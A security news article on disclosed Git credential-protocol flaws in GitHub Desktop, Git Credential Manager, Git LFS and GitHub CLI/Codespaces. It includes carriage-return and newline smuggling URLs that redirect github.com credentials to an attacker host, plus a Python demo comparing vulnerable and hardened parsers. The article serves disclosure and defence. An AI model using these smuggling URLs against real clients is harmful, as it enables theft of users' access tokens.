Sunday, February 9, 2025

GitHub Vulnerability Exposes User Credentials via Malicious Repositories


A security researcher recently disclosed several critical vulnerabilities affecting Git-related projects, showing how sloppy handling of the Git credential protocol, a line-oriented text format, can leak stored credentials to a host the user never meant to authenticate to.

From GitHub Desktop to Git Credential Manager and Git LFS, these issues were uncovered during a routine bug-hunting session for the GitHub Bug Bounty program, resulting in the assignment of multiple CVEs.

Improper Parsing in GitHub Desktop Enables Credential Leakage (CVE-2025-23040)

A flaw in GitHub Desktop’s handling of the Git Credential Protocol was identified as a potential vector for credential exposure.

The issue stems from how the tool’s credential helper, called “trampoline,” parses user input.

Within the parseCredential function, a flawed regular expression treated carriage return characters (\r) as line terminators.

The Git credential protocol delimits its key=value properties with newline characters (\n) only, so a parser that also honours \r lets an attacker smuggle extra properties inside a single value, an attack the researcher calls “carriage return smuggling.”

An attacker hosting a malicious repository can therefore use a remote URL such as http://%0dprotocol=https%0dhost=github.com%0d@localhost. The percent-encoded carriage returns sit in the URL's userinfo, which Git decodes and passes to the helper as the username value. Because the trampoline splits on \r as well, it reads the smuggled protocol=https and host=github.com lines as the real request and returns the user's github.com credentials, which Git then sends to the attacker-controlled host (localhost in this example).

Git Credential Manager Vulnerability via StreamReader Misuse (CVE-2024-50338)

Another critical issue was identified in Git Credential Manager, a cross-platform credential helper for Git built on .NET.

The vulnerability arises from the use of the .NET StreamReader class to read the request line by line. StreamReader.ReadLine accepts three line terminators (\n, \r and \r\n), whereas the Git credential protocol uses \n alone.

As a result, an attacker can craft a remote URL whose userinfo contains carriage return characters, and Git will forward that value to the helper unmodified, since Git only checks credential values for newline characters.

When Git Credential Manager reads such a request, the smuggled host and protocol lines override the real ones, so it hands Git the credentials stored for a legitimate host (e.g., github.com) in answer to a request that was really about an attacker-controlled host. Git then sends those credentials to that host.

The researcher also discovered a vulnerability in Git LFS (Large File Storage). Unlike Git itself, which refuses to write a credential value containing a newline, Git LFS did not sanitize the values it passed to the credential helper.

According to Flatt Security, by embedding a newline character in the URL configured in a repository's .lfsconfig file, an attacker can inject additional properties directly into the credential request, bypassing the safeguard Git itself provides and potentially leaking credentials.

For example, a crafted URL in .lfsconfig could cause Git LFS to send the following malformed request to the credential helper:

protocol=http
host=localhost
username=
host=github.com
protocol=https

Most credential helpers treat the last occurrence of a key as authoritative, so the helper resolves this request to protocol=https and host=github.com and returns the github.com credentials, which Git LFS then presents to the attacker's host.
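The three bugs above are one failure mode seen from two sides: either the helper accepts more line terminators than the protocol defines (GitHub Desktop, Git Credential Manager), or the producer never rejects stray newlines (Git LFS). The following script is an added example, not code from GitHub Desktop, Git Credential Manager, Git LFS or Flatt Security. It builds the credential request Git or Git LFS would send for the two attack URLs discussed above, runs it through a parser that mimics the vulnerable behaviour and through a hardened newline-only parser, and shows which one hands out the github.com credentials. The credential store, both parsers and helper_respond() are illustrative assumptions, not the vendors' real implementations or their patches.

```python
"""Carriage-return smuggling against a Git credential helper (added example)."""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed credential store: what the helper holds for each (protocol, host).
FAKE_STORE = {("https", "github.com"): ("victim", "ghp_EXAMPLE_TOKEN")}

# The two attacker-controlled URLs from the write-up. Git decodes the percent-
# encoded userinfo before writing it into the credential request.
ATTACK_URL = "http://%0dprotocol=https%0dhost=github.com%0d@localhost"  # \r smuggling
LFS_URL = "http://%0ahost=github.com%0aprotocol=https@localhost"        # \n smuggling


def git_credential_request(url: str, reject_newlines: bool = True) -> str:
    """Build the key=value request a client sends to its credential helper.

    reject_newlines=True mimics Git, which refuses values containing '\\n'
    but says nothing about '\\r'. reject_newlines=False mimics a producer such
    as the unpatched Git LFS, which passed the URL through unchecked.
    """
    parts = urlsplit(url)
    fields = [("protocol", parts.scheme), ("host", parts.hostname or "")]
    if parts.username is not None:
        fields.append(("username", unquote(parts.username)))
    lines = []
    for key, value in fields:
        if reject_newlines and "\n" in value:
            raise ValueError(f"credential value for {key} contains newline")
        lines.append(f"{key}={value}\n")
    return "".join(lines) + "\n"  # blank line terminates the request


def parse_vulnerable(request: str) -> dict:
    """Helper-side parser that accepts \\n, \\r and \\r\\n as terminators.

    This is the behaviour of .NET's StreamReader.ReadLine and of the regex
    the article attributes to the GitHub Desktop trampoline. Later keys
    overwrite earlier ones, so a smuggled host=github.com wins.
    """
    result = {}
    for line in re.split(r"\r\n|\r|\n", request):
        if line == "":
            break  # blank line: end of request
        key, _, value = line.partition("=")
        result[key] = value
    return result


def parse_hardened(request: str) -> dict:
    """Newline-only parser that refuses anything the protocol does not allow.

    Illustrative hardening (an assumption, not a vendor patch): reject '\\r'
    anywhere, reject malformed keys, and reject repeated single-valued keys.
    Keys ending in '[]' (e.g. wwwauth[]) are legitimately multi-valued.
    """
    result = {}
    for line in request.split("\n"):
        if line == "":
            break
        if "\r" in line:
            raise ValueError("carriage return in credential line")
        key, sep, value = line.partition("=")
        if not sep or not re.fullmatch(r"[A-Za-z0-9_.\-\[\]]+", key):
            raise ValueError(f"malformed credential line: {line!r}")
        if key in result and not key.endswith("[]"):
            raise ValueError(f"duplicate credential key: {key}")
        result[key] = value
    return result


def helper_respond(request: str, parser) -> Optional[tuple]:
    """What the helper returns to Git: the stored credential for the
    (protocol, host) it parsed, or None if nothing matches or parsing fails."""
    try:
        fields = parser(request)
    except ValueError:
        return None
    return FAKE_STORE.get((fields.get("protocol"), fields.get("host")))


if __name__ == "__main__":
    req = git_credential_request(ATTACK_URL)
    print("request Git sends:", repr(req))
    print("vulnerable helper returns:", helper_respond(req, parse_vulnerable))
    print("hardened helper returns:  ", helper_respond(req, parse_hardened))
    lfs_req = git_credential_request(LFS_URL, reject_newlines=False)
    print("LFS-style request:", repr(lfs_req))
    print("vulnerable helper returns:", helper_respond(lfs_req, parse_vulnerable))
    print("hardened helper returns:  ", helper_respond(lfs_req, parse_hardened))
```

Running the script shows the asymmetry the article describes: for ATTACK_URL, Git itself writes the request without complaint (no \n present), the vulnerable parser resolves it to github.com and returns the token, and the hardened parser rejects it. For LFS_URL, Git refuses to write the request at all, but a producer that skips that check emits exactly the five-line message shown above, and only the duplicate-key rule in the hardened parser stops the leak on the helper side.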

Separate vulnerabilities were found in GitHub CLI and Codespaces. In GitHub CLI, faulty logic in the tokenForHost function caused the CLI's credential helper to return an access token for hosts it should not have trusted under specific conditions.

The issue primarily affected enterprise host handling and GitHub Codespaces, where the CODESPACES environment variable is always set to true.

A malicious repository cloned on Codespaces could exploit this to exfiltrate access tokens.

Similarly, a basic credential helper script used in Codespaces exposed tokens because it returned the token for any requested host without checking it.

The patches introduced host validation so that credentials are only returned for trusted endpoints.

These vulnerabilities highlight how a small parsing oversight in a text-based protocol, such as honouring one extra line terminator, can turn into a credential leak.

Credential leakage, particularly in widely used tools like GitHub Desktop, Git Credential Manager, and Git LFS, underscores the importance of rigorous input validation and adherence to secure coding practices.

While patches have been deployed to address these issues, the findings serve as a cautionary tale for the broader open-source community.

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
